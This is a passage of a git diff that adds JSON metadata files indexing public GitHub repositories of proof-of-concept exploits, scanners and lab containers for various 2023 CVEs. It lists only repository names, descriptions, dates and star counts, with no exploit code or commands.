5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50094.json b/2023/CVE-2023-50094.json new file mode 100644 index 0000000000..88e71a9ae3 --- /dev/null +++ b/2023/CVE-2023-50094.json @@ -0,0 +1,33 @@ +[ + { + "id": 893203261, + "name": "CVE-2023-50094_POC", + "full_name": "Zierax\/CVE-2023-50094_POC", + "owner": { + "login": "Zierax", + "id": 153237520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153237520?v=4", + "html_url": "https:\/\/github.com\/Zierax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zierax\/CVE-2023-50094_POC", + "description": "poc for CVE-2023-50094 (rengine command injection)", + "fork": false, + "created_at": "2024-11-23T20:00:29Z", + "updated_at": "2024-11-23T20:11:04Z", + "pushed_at": "2024-11-23T20:11:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50131.json b/2023/CVE-2023-50131.json new file mode 100644 index 0000000000..6a1b52c692 --- /dev/null +++ b/2023/CVE-2023-50131.json @@ -0,0 +1,33 @@ +[ + { + "id": 732301458, + "name": "CVE-2023-50131", + "full_name": "sajaljat\/CVE-2023-50131", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-50131", + "description": "XSS ", + "fork": false, + "created_at": "2023-12-16T08:08:11Z", + "updated_at": "2023-12-16T08:08:11Z", + "pushed_at": "2023-12-16T08:12:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50132.json b/2023/CVE-2023-50132.json new file mode 100644 index 0000000000..76286fb429 --- /dev/null +++ b/2023/CVE-2023-50132.json @@ -0,0 +1,33 @@ +[ + { + "id": 732302850, + "name": "CVE-2023-50132", + "full_name": "sajaljat\/CVE-2023-50132", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-50132", + "description": null, + "fork": false, + "created_at": "2023-12-16T08:14:14Z", + "updated_at": "2023-12-16T08:14:14Z", + "pushed_at": "2023-12-16T08:16:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50164.json b/2023/CVE-2023-50164.json new file mode 100644 index 0000000000..aa23aabb8e --- /dev/null +++ b/2023/CVE-2023-50164.json @@ -0,0 +1,442 @@ +[ + { + "id": 581073273, + "name": "CVE-2023-50164", + "full_name": "minhbao15677\/CVE-2023-50164", + "owner": { + "login": "minhbao15677", + "id": 29054035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29054035?v=4", + "html_url": "https:\/\/github.com\/minhbao15677", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/minhbao15677\/CVE-2023-50164", + "description": null, + "fork": false, + "created_at": "2022-12-22T07:49:13Z", + "updated_at": "2024-04-26T02:52:45Z", + "pushed_at": "2024-04-26T02:52:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731065261, + "name": "CVE-2023-50164-Apache-Struts-RCE", + "full_name": "jakabakos\/CVE-2023-50164-Apache-Struts-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-50164-Apache-Struts-RCE", + "description": "A critical security vulnerability, identified as CVE-2023-50164 (CVE: 9.8) was found in Apache Struts, allowing attackers to manipulate file upload parameters that can potentially lead to unauthorized path traversal and remote code execution (RCE).", + "fork": false, + "created_at": "2023-12-13T09:31:36Z", + "updated_at": "2024-12-23T13:10:55Z", + "pushed_at": "2024-08-30T06:37:53Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 82, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 732181811, + "name": "CVE-2023-50164", + "full_name": "bcdannyboy\/CVE-2023-50164", + "owner": { + "login": "bcdannyboy", + "id": 12553297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4", + "html_url": "https:\/\/github.com\/bcdannyboy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2023-50164", + "description": "A scanning utility and PoC for CVE-2023-50164", + "fork": false, + "created_at": "2023-12-15T21:19:51Z", + "updated_at": "2024-06-05T13:33:18Z", + "pushed_at": "2023-12-15T23:50:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 732688819, + "name": "cve-2023-50164-poc", + "full_name": "dwisiswant0\/cve-2023-50164-poc", + "owner": { + "login": "dwisiswant0", + "id": 25837540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25837540?v=4", + "html_url": "https:\/\/github.com\/dwisiswant0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dwisiswant0\/cve-2023-50164-poc", + "description": "Proof of Concept for Path Traversal in Apache Struts (\"CVE-2023-50164\")", + "fork": false, + "created_at": "2023-12-17T14:18:54Z", + "updated_at": "2024-11-16T19:50:08Z", + "pushed_at": "2023-12-18T02:46:21Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": true, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 59, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 732950140, + "name": "cve-2023-50164", + "full_name": "helsecert\/cve-2023-50164", + "owner": { + "login": "helsecert", + "id": 2202200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202200?v=4", + "html_url": "https:\/\/github.com\/helsecert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/helsecert\/cve-2023-50164", + "description": null, + "fork": false, + "created_at": "2023-12-18T08:24:26Z", + "updated_at": "2024-01-13T09:38:24Z", + "pushed_at": "2023-12-18T13:29:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 733837034, + "name": "CVE-2023-50164-Apache-Struts-RCE", + "full_name": "Thirukrishnan\/CVE-2023-50164-Apache-Struts-RCE", + "owner": { + "login": "Thirukrishnan", + "id": 63901950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63901950?v=4", + "html_url": "https:\/\/github.com\/Thirukrishnan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Thirukrishnan\/CVE-2023-50164-Apache-Struts-RCE", + "description": null, + "fork": false, + "created_at": "2023-12-20T08:39:54Z", + "updated_at": "2024-01-23T11:26:28Z", + "pushed_at": "2023-12-20T09:51:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733839177, + "name": "CVE-2023-50164-ApacheStruts2-Docker", + "full_name": "Trackflaw\/CVE-2023-50164-ApacheStruts2-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-50164-ApacheStruts2-Docker", + "description": "Vulnerable docker container for Apache Struts 2 RCE CVE-2023-50164", + "fork": false, + "created_at": "2023-12-20T08:46:19Z", + "updated_at": "2024-05-14T07:52:52Z", + "pushed_at": "2023-12-20T12:57:28Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734560456, + "name": "cve-2023-50164", + "full_name": "miles3719\/cve-2023-50164", + "owner": { + "login": "miles3719", + "id": 104630628, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104630628?v=4", + "html_url": "https:\/\/github.com\/miles3719", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miles3719\/cve-2023-50164", + "description": null, + "fork": false, + "created_at": "2023-12-22T02:15:36Z", + "updated_at": "2023-12-22T02:15:36Z", + "pushed_at": "2023-12-22T02:15:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 734561364, + "name": "cve-2023-50164", + "full_name": "aaronm-sysdig\/cve-2023-50164", + "owner": { + "login": "aaronm-sysdig", + "id": 132866139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132866139?v=4", + "html_url": "https:\/\/github.com\/aaronm-sysdig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaronm-sysdig\/cve-2023-50164", + "description": null, + "fork": false, + "created_at": "2023-12-22T02:20:11Z", + "updated_at": "2024-01-13T09:38:29Z", + "pushed_at": "2024-01-01T03:25:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737392401, + "name": "CVE-2023-50164-POC", + "full_name": "snyk-labs\/CVE-2023-50164-POC", + "owner": { + "login": "snyk-labs", + "id": 47793611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47793611?v=4", + "html_url": "https:\/\/github.com\/snyk-labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snyk-labs\/CVE-2023-50164-POC", + "description": null, + "fork": false, + "created_at": "2023-12-30T21:37:08Z", + "updated_at": "2024-11-29T05:49:34Z", + "pushed_at": "2024-01-16T14:59:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 742353008, + "name": "CVE-2023-50164-PoC", + "full_name": "sunnyvale-it\/CVE-2023-50164-PoC", + "owner": { + "login": "sunnyvale-it", + "id": 44291039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291039?v=4", + "html_url": "https:\/\/github.com\/sunnyvale-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunnyvale-it\/CVE-2023-50164-PoC", + "description": "CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept", + "fork": false, + "created_at": "2024-01-12T09:34:57Z", + "updated_at": "2024-01-25T20:19:52Z", + "pushed_at": "2024-01-16T13:05:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 787494467, + "name": "CVE-2023-50164Analysis-", + "full_name": "AsfandAliMemon25\/CVE-2023-50164Analysis-", + "owner": { + "login": "AsfandAliMemon25", + "id": 154571318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154571318?v=4", + "html_url": "https:\/\/github.com\/AsfandAliMemon25", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AsfandAliMemon25\/CVE-2023-50164Analysis-", + "description": "CVE-2023-50164 An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.", + "fork": false, + "created_at": "2024-04-16T16:20:04Z", + "updated_at": "2024-04-24T12:11:57Z", + "pushed_at": "2024-04-16T17:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "dockerfile", + "exploit", + "vulnerability", + "webapplications" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868505012, + "name": "CVE-2023-50164-PoC", + "full_name": "NikitaPark\/CVE-2023-50164-PoC", + "owner": { + "login": "NikitaPark", + "id": 25609921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25609921?v=4", + "html_url": "https:\/\/github.com\/NikitaPark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NikitaPark\/CVE-2023-50164-PoC", + "description": "CVE-2023-50164 PoC Application & Exploit script", + "fork": false, + "created_at": "2024-10-06T14:58:26Z", + "updated_at": "2024-12-17T06:08:14Z", + "pushed_at": "2024-10-09T11:18:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891621160, + "name": "CVE-2024-10924-Wordpress-Docker", + "full_name": "Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "description": "Vulnerable docker container for Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentication Bypass CVE-2023-50164", + "fork": false, + "created_at": "2024-11-20T16:50:24Z", + "updated_at": "2024-11-25T19:41:23Z", + "pushed_at": "2024-11-22T09:28:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50226.json b/2023/CVE-2023-50226.json new file mode 100644 index 0000000000..4eb4026b8c --- /dev/null +++ b/2023/CVE-2023-50226.json @@ -0,0 +1,33 @@ +[ + { + "id": 711137981, + "name": "parallels-file-move-privesc", + "full_name": "kn32\/parallels-file-move-privesc", + "owner": { + "login": "kn32", + "id": 105210950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105210950?v=4", + "html_url": "https:\/\/github.com\/kn32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn32\/parallels-file-move-privesc", + "description": "Parallels Desktop privilege escalation - CVE-2023-50226 \/ ZDI-CAN-21227", + "fork": false, + "created_at": "2023-10-28T10:29:53Z", + "updated_at": "2024-01-30T20:34:52Z", + "pushed_at": "2023-12-31T08:48:26Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5024.json b/2023/CVE-2023-5024.json new file mode 100644 index 0000000000..987eb47478 --- /dev/null +++ b/2023/CVE-2023-5024.json @@ -0,0 +1,33 @@ +[ + { + "id": 697093590, + "name": "CVE-2023-5024", + "full_name": "PH03N1XSP\/CVE-2023-5024", + "owner": { + "login": "PH03N1XSP", + "id": 22360364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22360364?v=4", + "html_url": "https:\/\/github.com\/PH03N1XSP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PH03N1XSP\/CVE-2023-5024", + "description": null, + "fork": false, + "created_at": "2023-09-27T03:28:02Z", + "updated_at": "2023-09-27T03:28:03Z", + "pushed_at": "2023-09-27T03:46:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50245.json b/2023/CVE-2023-50245.json new file mode 100644 index 0000000000..44a6be71a1 --- /dev/null +++ b/2023/CVE-2023-50245.json @@ -0,0 +1,33 @@ +[ + { + "id": 845351915, + "name": "CVE-2023-50245", + "full_name": "200101WhoAmI\/CVE-2023-50245", + "owner": { + "login": "200101WhoAmI", + "id": 176820518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176820518?v=4", + "html_url": "https:\/\/github.com\/200101WhoAmI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/200101WhoAmI\/CVE-2023-50245", + "description": "exr viewer", + "fork": false, + "created_at": "2024-08-21T04:49:18Z", + "updated_at": "2024-08-21T04:49:40Z", + "pushed_at": "2024-08-21T04:49:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50254.json b/2023/CVE-2023-50254.json new file mode 100644 index 0000000000..f4327078db --- /dev/null +++ b/2023/CVE-2023-50254.json @@ -0,0 +1,33 @@ +[ + { + "id": 734620925, + "name": "deepin-linux_reader_RCE-exploit", + "full_name": "febinrev\/deepin-linux_reader_RCE-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/deepin-linux_reader_RCE-exploit", + "description": "CVE-2023-50254: PoC Exploit for Deepin-reader RCE that affects unpatched Deepin Linux Desktops. Deepin Linux's default document reader \"deepin-reader\" software suffers from a serious vulnerability due to a design flaw that leads to Remote Command Execution via crafted docx document.", + "fork": false, + "created_at": "2023-12-22T06:50:28Z", + "updated_at": "2024-11-15T17:03:30Z", + "pushed_at": "2023-12-22T06:59:34Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50386.json b/2023/CVE-2023-50386.json new file mode 100644 index 0000000000..6e8ec56c40 --- /dev/null +++ b/2023/CVE-2023-50386.json @@ -0,0 +1,33 @@ +[ + { + "id": 765085923, + "name": "Apache-Solr-RCE_CVE-2023-50386_POC", + "full_name": "vvmdx\/Apache-Solr-RCE_CVE-2023-50386_POC", + "owner": { + "login": "vvmdx", + "id": 75788310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75788310?v=4", + "html_url": "https:\/\/github.com\/vvmdx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vvmdx\/Apache-Solr-RCE_CVE-2023-50386_POC", + "description": "Apache Solr Backup\/Restore APIs RCE Poc (CVE-2023-50386)", + "fork": false, + "created_at": "2024-02-29T08:57:47Z", + "updated_at": "2024-11-20T16:30:41Z", + "pushed_at": "2024-02-29T12:54:56Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50387.json b/2023/CVE-2023-50387.json new file mode 100644 index 0000000000..2da9b1312b --- /dev/null +++ b/2023/CVE-2023-50387.json @@ -0,0 +1,95 @@ +[ + { + "id": 759552298, + "name": "CVE-2023-50387", + "full_name": "knqyf263\/CVE-2023-50387", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2023-50387", + "description": "KeyTrap (DNSSEC)", + "fork": false, + "created_at": "2024-02-18T21:50:04Z", + "updated_at": "2024-10-31T10:01:25Z", + "pushed_at": "2024-02-18T22:15:14Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 41, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 804928080, + "name": "SSR-DNSSEC", + "full_name": "Meirelez\/SSR-DNSSEC", + "owner": { + "login": "Meirelez", + "id": 131269269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131269269?v=4", + "html_url": "https:\/\/github.com\/Meirelez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Meirelez\/SSR-DNSSEC", + "description": "In this repository you can find the files used to try to produce a POC for the CVE-2023-50387", + "fork": false, + "created_at": "2024-05-23T14:41:50Z", + "updated_at": "2024-05-23T19:29:12Z", + "pushed_at": "2024-05-23T19:29:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 898427651, + "name": "CVE-2023-50387", + "full_name": "Pablodiz\/CVE-2023-50387", + "owner": { + "login": "Pablodiz", + "id": 114071507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114071507?v=4", + "html_url": "https:\/\/github.com\/Pablodiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pablodiz\/CVE-2023-50387", + "description": null, + "fork": false, + "created_at": "2024-12-04T11:27:11Z", + "updated_at": "2024-12-05T10:54:33Z", + "pushed_at": "2024-12-05T10:54:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5043.json b/2023/CVE-2023-5043.json new file mode 100644 index 0000000000..49fc46233f --- /dev/null +++ b/2023/CVE-2023-5043.json @@ -0,0 +1,38 @@ +[ + { + "id": 743454639, + "name": "CVE-2023-5043", + "full_name": "r0binak\/CVE-2023-5043", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": "https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/CVE-2023-5043", + "description": "PoC CVE-2023-5043", + "fork": false, + "created_at": "2024-01-15T09:20:35Z", + "updated_at": "2024-01-15T09:27:28Z", + "pushed_at": "2024-01-15T09:25:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kubernetes", + "nginx", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5044.json b/2023/CVE-2023-5044.json new file mode 100644 index 0000000000..c74c160ba6 --- /dev/null +++ b/2023/CVE-2023-5044.json @@ -0,0 +1,99 @@ +[ + { + "id": 711804243, + "name": "CVE-2023-5044", + "full_name": "r0binak\/CVE-2023-5044", + "owner": { + "login": "r0binak", + "id": 80983900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80983900?v=4", + "html_url": "https:\/\/github.com\/r0binak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0binak\/CVE-2023-5044", + "description": "PoC CVE-2023-5044", + "fork": false, + "created_at": "2023-10-30T07:59:11Z", + "updated_at": "2024-01-15T02:36:46Z", + "pushed_at": "2023-12-30T18:10:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kubernetes", + "nginx" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 744551896, + "name": "cve-2023-5044", + "full_name": "4ARMED\/cve-2023-5044", + "owner": { + "login": "4ARMED", + "id": 5612667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5612667?v=4", + "html_url": "https:\/\/github.com\/4ARMED", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4ARMED\/cve-2023-5044", + "description": null, + "fork": false, + "created_at": "2024-01-17T14:32:54Z", + "updated_at": "2024-01-31T02:18:13Z", + "pushed_at": "2024-01-29T21:36:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 779402262, + "name": "CVE-2023-5044", + "full_name": "KubernetesBachelor\/CVE-2023-5044", + "owner": { + "login": "KubernetesBachelor", + "id": 162622196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162622196?v=4", + "html_url": "https:\/\/github.com\/KubernetesBachelor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KubernetesBachelor\/CVE-2023-5044", + "description": "Poc for CVE 2023 5044", + "fork": false, + "created_at": "2024-03-29T18:53:50Z", + "updated_at": "2024-03-30T13:41:43Z", + "pushed_at": "2024-04-11T07:15:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50465.json b/2023/CVE-2023-50465.json new file mode 100644 index 0000000000..dbc828317e --- /dev/null +++ b/2023/CVE-2023-50465.json @@ -0,0 +1,33 @@ +[ + { + "id": 700635443, + "name": "CVE-2023-50465", + "full_name": "Ev3rR3d\/CVE-2023-50465", + "owner": { + "login": "Ev3rR3d", + "id": 108440914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108440914?v=4", + "html_url": "https:\/\/github.com\/Ev3rR3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ev3rR3d\/CVE-2023-50465", + "description": null, + "fork": false, + "created_at": "2023-10-05T01:36:08Z", + "updated_at": "2024-01-20T04:15:54Z", + "pushed_at": "2023-10-05T01:41:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50564.json b/2023/CVE-2023-50564.json new file mode 100644 index 0000000000..db457d9858 --- /dev/null +++ b/2023/CVE-2023-50564.json @@ -0,0 +1,219 @@ +[ + { + "id": 831858004, + "name": "CVE-2023-50564_Pluck-v4.7.18_PoC", + "full_name": "Rai2en\/CVE-2023-50564_Pluck-v4.7.18_PoC", + "owner": { + "login": "Rai2en", + "id": 108242154, + "avatar_url": 